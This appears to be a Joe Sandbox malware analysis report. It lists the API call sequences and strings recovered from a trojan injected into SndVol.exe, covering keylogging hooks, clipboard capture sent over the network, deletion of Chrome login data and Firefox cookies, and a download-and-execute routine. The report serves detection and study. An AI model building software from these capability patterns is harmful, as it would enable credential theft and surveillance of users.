                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 1164774033-405221262
                                                                        • Opcode ID: 95335fa02aed8cf2c83bb72866ddb20bacf45d9ccdd6b4aa338c3ad9b872ca0d
                                                                        • Instruction ID: e5a73fb0e2fa447930d5502f3f977bda59ff5611c3abfad3c9fe0e9ea01b797d
                                                                        • Opcode Fuzzy Hash: 95335fa02aed8cf2c83bb72866ddb20bacf45d9ccdd6b4aa338c3ad9b872ca0d
                                                                        • Instruction Fuzzy Hash: E0319531914159BAEB19E773DC98DFD777CBF20258FC05019E406A2094EF34AB8BCA58
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C37D
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C3AD
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C41F
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C42C
                                                                          • Part of subcall function 2914C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C402
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C44D
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C463
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C46A
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C473
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                        • String ID:
                                                                        • API String ID: 2341273852-0
                                                                        • Opcode ID: be865b415b530bfda480b921ec5b4576ce09b84f23eb8af66f6e77b52ec7857c
                                                                        • Instruction ID: 10f980844af30fc28a12bbed419b69648288ac2740918986b3b9d110186e28da
                                                                        • Opcode Fuzzy Hash: be865b415b530bfda480b921ec5b4576ce09b84f23eb8af66f6e77b52ec7857c
                                                                        • Instruction Fuzzy Hash: 4831E572D0121CAAEB54D772DD4CEEA73BCAF08308F4415F6E545D2054EB3997C6CAA0
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 2913A30E
                                                                        • SetWindowsHookExA.USER32(0000000D,2913A2DF,00000000), ref: 2913A31C
                                                                        • GetLastError.KERNEL32 ref: 2913A328
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 2913A376
                                                                        • TranslateMessage.USER32(?), ref: 2913A385
                                                                        • DispatchMessageA.USER32(?), ref: 2913A390
                                                                        Strings
                                                                        • Keylogger initialization failure: error , xrefs: 2913A33C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                        • String ID: Keylogger initialization failure: error
                                                                        • API String ID: 3219506041-952744263
                                                                        • Opcode ID: c03c4bdb6af098f3cc277c97ea61e574543e181d6bbb341b6ff0f779f5bb2930
                                                                        • Instruction ID: a1595528efa67f73fc47de032a06cb5a116f1194020e8d66e0a7bc24cb2034d5
                                                                        • Opcode Fuzzy Hash: c03c4bdb6af098f3cc277c97ea61e574543e181d6bbb341b6ff0f779f5bb2930
                                                                        • Instruction Fuzzy Hash: 5311C131B10284ABD7047A77DC4D85B77FCFB96718B90452DF882D2184EA308706C7A5
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 2913A451
                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 2913A45D
                                                                        • GetKeyboardLayout.USER32(00000000), ref: 2913A464
                                                                        • GetKeyState.USER32(00000010), ref: 2913A46E
                                                                        • GetKeyboardState.USER32(?,?,00000000), ref: 2913A479
                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A49C
                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 2913A4FC
                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A535
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                        • String ID:
                                                                        • API String ID: 1888522110-0
                                                                        • Opcode ID: 2db3666144d4807bd35c951c36265458ad6c2b8d06d63c87b11df7c370380534
                                                                        • Instruction ID: 8b19216af05a40929ec8b79e02ec00f66422f7c7606ccf54e3b3db2e25edba88
                                                                        • Opcode Fuzzy Hash: 2db3666144d4807bd35c951c36265458ad6c2b8d06d63c87b11df7c370380534
                                                                        • Instruction Fuzzy Hash: 4A319572604348BFD700DBA1DC44FDBB7ECFB48744F40082AB645961A4D7B5EA49DB92
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 2914697C
                                                                        • EmptyClipboard.USER32 ref: 2914698A
                                                                        • CloseClipboard.USER32 ref: 29146990
                                                                        • OpenClipboard.USER32 ref: 29146997
                                                                        • GetClipboardData.USER32(0000000D), ref: 291469A7
                                                                        • GlobalLock.KERNEL32(00000000), ref: 291469B0
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 291469B9
                                                                        • CloseClipboard.USER32 ref: 291469BF
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                        • String ID:
                                                                        • API String ID: 2172192267-0
                                                                        • Opcode ID: a4612d6b181f356aab7b01539941fd3bf3295bae72ac9258bdd552af9a914dd6
                                                                        • Instruction ID: 775f30bd9173c203487e4b260cd3e82909056161ea48b3d0b50497b75335f7c6
                                                                        • Opcode Fuzzy Hash: a4612d6b181f356aab7b01539941fd3bf3295bae72ac9258bdd552af9a914dd6
                                                                        • Instruction Fuzzy Hash: 84018031704244AFE754BB73DC4CAAE7BB8BF94715F80546DE907C20C8DF388A069651
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 291440D8
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 291440E4
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 291442A5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291442AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                        • API String ID: 2127411465-314212984
                                                                        • Opcode ID: e200a7659517eeb6d885e3b63478ba13dd0238df7762c8766724acd516aac0fa
                                                                        • Instruction ID: 464da17655a983e76d49fb8443999c0a5f3889b148efc702c5ab8d341d88bc38
                                                                        • Opcode Fuzzy Hash: e200a7659517eeb6d885e3b63478ba13dd0238df7762c8766724acd516aac0fa
                                                                        • Instruction Fuzzy Hash: C0B12432E0420076DA48F777DD56CAE36B85FB565CFC0A92CA416970E0EE219B0FC796
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 2913BA89
                                                                        • GetLastError.KERNEL32 ref: 2913BA93
                                                                        Strings
                                                                        • UserProfile, xrefs: 2913BA59
                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 2913BAB9
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 2913BA54
                                                                        • [Chrome StoredLogins not found], xrefs: 2913BAAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                        • API String ID: 2018770650-1062637481
                                                                        • Opcode ID: 6705455b2d3b74b4db61d64c41cf63043da19a50c800764888794bdbfa89a3e5
                                                                        • Instruction ID: 68c79fe71b9831a43914e3d3bae40dc8ba05480518e1a2af372bb411b377f375
                                                                        • Opcode Fuzzy Hash: 6705455b2d3b74b4db61d64c41cf63043da19a50c800764888794bdbfa89a3e5
                                                                        • Instruction Fuzzy Hash: 2601D631EA00097A6B48B7B7DC568FD7738AF3118CBC05519E40253198FE119B4B87E6
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 2914799A
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 291479A1
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 291479B3
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 291479D2
                                                                        • GetLastError.KERNEL32 ref: 291479D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 3534403312-3733053543
                                                                        • Opcode ID: 2c6d6feddd77edc6c84f36ed472ab6f0883e4c105e8381997b1c21fb3851c8ce
                                                                        • Instruction ID: 187ce13ad1a4bee1fe7c6d8cf70848a2f8fe9eb545c74dfec5db336931d1293d
                                                                        • Opcode Fuzzy Hash: 2c6d6feddd77edc6c84f36ed472ab6f0883e4c105e8381997b1c21fb3851c8ce
                                                                        • Instruction Fuzzy Hash: 75F0DA7190216DABEB10ABA6ED4DAEF7FBCFF05315F114054B905A1144D6384A04DBF1
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 29139293
                                                                          • Part of subcall function 291348C8: connect.WS2_32(?,?,?), ref: 291348E0
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913932F
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 2913938D
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 291393E5
                                                                        • FindClose.KERNEL32(00000000), ref: 291393FC
                                                                          • Part of subcall function 29134E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E38
                                                                          • Part of subcall function 29134E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E43
                                                                          • Part of subcall function 29134E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E4C
                                                                        • FindClose.KERNEL32(00000000), ref: 291395F4
                                                                          • Part of subcall function 29134AA1: WaitForSingleObject.KERNEL32(?,00000000,2913547D,?,?,00000004,?,?,00000004,?,291A4EF8,?), ref: 29134B47
                                                                          • Part of subcall function 29134AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,291A4EF8,?,?,?,?,?,?,2913547D), ref: 29134B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                        • String ID:
                                                                        • API String ID: 1824512719-0
                                                                        • Opcode ID: a7852d9669da3d4549491d971deee8bf6691819c06fd6666b93cd3ebd8c84656
                                                                        • Instruction ID: e5ce3721cde24c5f6019d096ea2ec4cad4491cfa4efc746cee9f1be9155f20d2
                                                                        • Opcode Fuzzy Hash: a7852d9669da3d4549491d971deee8bf6691819c06fd6666b93cd3ebd8c84656
                                                                        • Instruction Fuzzy Hash: 96B1B571900108EBDB48EBA2DD91EED7379AF24318FD09159D906A70D4EF34AB4ACB58
                                                                        APIs
                                                                          • Part of subcall function 2914798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 2914799A
                                                                          • Part of subcall function 2914798D: OpenProcessToken.ADVAPI32(00000000), ref: 291479A1
                                                                          • Part of subcall function 2914798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 291479B3
                                                                          • Part of subcall function 2914798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 291479D2
                                                                          • Part of subcall function 2914798D: GetLastError.KERNEL32 ref: 291479D8
                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 29146891
                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 291468A6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291468AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                        • API String ID: 1589313981-1420736420
                                                                        • Opcode ID: 12006aaa16b6d3a2a682f1169f28ccf5267181f29f9933811c48578c6564dd85
                                                                        • Instruction ID: 747f29489f885ae5dbb1fc77242a25a8a0a44578372584a4d47336f86522446c
                                                                        • Opcode Fuzzy Hash: 12006aaa16b6d3a2a682f1169f28ccf5267181f29f9933811c48578c6564dd85
                                                                        • Instruction Fuzzy Hash: 8021D760B0434176EF88EBB38C9497E27695FB568CFC0AC386115570C8DE358B0BC366
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,291827DB,?,00000000), ref: 29182555
                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,291827DB,?,00000000), ref: 2918257E
                                                                        • GetACP.KERNEL32(?,?,291827DB,?,00000000), ref: 29182593
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: e2b4010544dc8b4a8797dfc5327a788394b4e8f48f36e0ce6f5889b900241f3f
                                                                        • Instruction ID: 64a1d2eade52a622c37765f383986d2dc984079a4b03097035c2123eb093530b
                                                                        • Opcode Fuzzy Hash: e2b4010544dc8b4a8797dfc5327a788394b4e8f48f36e0ce6f5889b900241f3f
                                                                        • Instruction Fuzzy Hash: BD21E562B80104A6F32E8B17D815ACB73A6FF44FE8B424C55E909D7115E732CF42EB90
                                                                        APIs
                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 2914B54A
                                                                        • LoadResource.KERNEL32(00000000,?,?,2913F419,00000000), ref: 2914B55E
                                                                        • LockResource.KERNEL32(00000000,?,?,2913F419,00000000), ref: 2914B565
                                                                        • SizeofResource.KERNEL32(00000000,?,?,2913F419,00000000), ref: 2914B574
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID: SETTINGS
                                                                        • API String ID: 3473537107-594951305
                                                                        • Opcode ID: 1344ffd29ee448fdce5b73dc3ce527f05f09df0c34cd88e2f55670c371318338
                                                                        • Instruction ID: 0f3c17b007e9d5293ba8d460448744fcf633e2be0f15fc456c12ebd1738186c3
                                                                        • Opcode Fuzzy Hash: 1344ffd29ee448fdce5b73dc3ce527f05f09df0c34cd88e2f55670c371318338
                                                                        • Instruction Fuzzy Hash: 6CE01275700298BBEB152B63EC4CD863E26F7C97627110454F5029661DC6398800E710
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 291396A5
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 2913971D
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 29139746
                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 2913975D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                        • String ID:
                                                                        • API String ID: 1157919129-0
                                                                        • Opcode ID: 2ecb34832f493248ded63494f22c883f8887e4dde2434c7240234d838278a3a6
                                                                        • Instruction ID: d93c311318f8f2d688475c101bfa78b6d9ef54fc2db40da3a555ff551b647139
                                                                        • Opcode Fuzzy Hash: 2ecb34832f493248ded63494f22c883f8887e4dde2434c7240234d838278a3a6
                                                                        • Instruction Fuzzy Hash: F1815532900018EBDB49EBA2DC90DED777CBF24258F90916AD416A7094FF306B4BCB54
                                                                        APIs
                                                                          • Part of subcall function 29178295: GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782CC
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                          • Part of subcall function 29178295: _abort.LIBCMT ref: 29178313
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782F4
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 29178301
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 2918279C
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 291827F7
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 29182806
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,29174AED,00000040,?,29174C0D,00000055,00000000,?,?,00000055,00000000), ref: 2918284E
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,29174B6D,00000040), ref: 2918286D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                        • String ID:
                                                                        • API String ID: 745075371-0
                                                                        • Opcode ID: de0dcdf965bd798db45a5074c59fd03d770f978bca2fbea2ee8e601dc6be17b8
                                                                        • Instruction ID: 022e16a65a0890c912d0a07143a1d3fda2df3000d33f449e7af80f34204783ee
                                                                        • Opcode Fuzzy Hash: de0dcdf965bd798db45a5074c59fd03d770f978bca2fbea2ee8e601dc6be17b8
                                                                        • Instruction Fuzzy Hash: 29514171E00209ABFB19DBA7CC84AFA73B8BF24784F414865EA14E7150D7749B42EF61
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 2913884C
                                                                        • FindFirstFileW.KERNEL32(00000000,?,29196618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29138905
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913892D
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 2913893A
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29138A50
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                        • String ID:
                                                                        • API String ID: 1771804793-0
                                                                        • Opcode ID: c93058240d42ff8d51eae3c6c30fb01b8726242e642a4a99c8fb69f3ec54915f
                                                                        • Instruction ID: d4fabcff4671103e274e1a5f44be2e0ad774e514a9c19e3f5975ca08cdd9a667
                                                                        • Opcode Fuzzy Hash: c93058240d42ff8d51eae3c6c30fb01b8726242e642a4a99c8fb69f3ec54915f
                                                                        • Instruction Fuzzy Hash: 32519532900108BADF48FB76DD959ED777CAF20248FD09159A806A7094EF34AB0FCB95
                                                                        APIs
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2918F244), ref: 2917944F
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,291A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 291794C7
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,291A27B8,000000FF,?,0000003F,00000000,?), ref: 291794F4
                                                                        • _free.LIBCMT ref: 2917943D
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29179609
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                        • String ID:
                                                                        • API String ID: 1286116820-0
                                                                        • Opcode ID: 10a0ee1a800f502b65a14b97f3b5d9da3bdc4186bb66b3e93b5e107ca1e69d55
                                                                        • Instruction ID: de1561189053d54680d1e5adc1929e998dd051791a01630241b5e61e7d735c8c
                                                                        • Opcode Fuzzy Hash: 10a0ee1a800f502b65a14b97f3b5d9da3bdc4186bb66b3e93b5e107ca1e69d55
                                                                        • Instruction Fuzzy Hash: 1351E971E0035AABC704EFABDD80CEAB7B8EF58368B10469AE51497184E7349F47CB50
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 29136FF7
                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 291370DB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadExecuteFileShell
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$open
                                                                        • API String ID: 2825088817-1291576107
                                                                        • Opcode ID: 17e5c80fc25ae2c8a40b4e411ba4bc70cf9403815991958bd412077dff2b6eba
                                                                        • Instruction ID: f89a948bfc3be9ac10f9ebc4a90c8ab3315fa78f2d3e09292171931c3f581a56
                                                                        • Opcode Fuzzy Hash: 17e5c80fc25ae2c8a40b4e411ba4bc70cf9403815991958bd412077dff2b6eba
                                                                        • Instruction Fuzzy Hash: 08610932A1420077EB58EA77CC95DAE37B95FE155CFC0982CE442571C4EE209B0BC3AA
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 2914CB68
                                                                          • Part of subcall function 291437AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 291437B9
                                                                          • Part of subcall function 291437AA: RegSetValueExA.KERNEL32(?,291974C8,00000000,?,00000000,00000000,291A52F0,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437E1
                                                                          • Part of subcall function 291437AA: RegCloseKey.KERNEL32(?,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                        • API String ID: 4127273184-3576401099
                                                                        • Opcode ID: 79998e71983d6a3a3dddfa984d7126c6d79c14f61cb1ded76024d378bc01b470
                                                                        • Instruction ID: 1a264bf52f37245715f37a01d97541ea46d84a349a582ac743ddbc4b83b2827e
                                                                        • Opcode Fuzzy Hash: 79998e71983d6a3a3dddfa984d7126c6d79c14f61cb1ded76024d378bc01b470
                                                                        • Instruction Fuzzy Hash: 9511A462F9014073F848313B5D56F9D381283966EDFC2A518E6072A6C9D4834B1303E6
                                                                        APIs
                                                                          • Part of subcall function 29178295: GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782CC
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                          • Part of subcall function 29178295: _abort.LIBCMT ref: 29178313
                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,29174AF4,?,?,?,?,2917454B,?,00000004), ref: 29181E3A
                                                                        • _wcschr.LIBVCRUNTIME ref: 29181ECA
                                                                        • _wcschr.LIBVCRUNTIME ref: 29181ED8
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,29174AF4,00000000,29174C14), ref: 29181F7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                        • String ID:
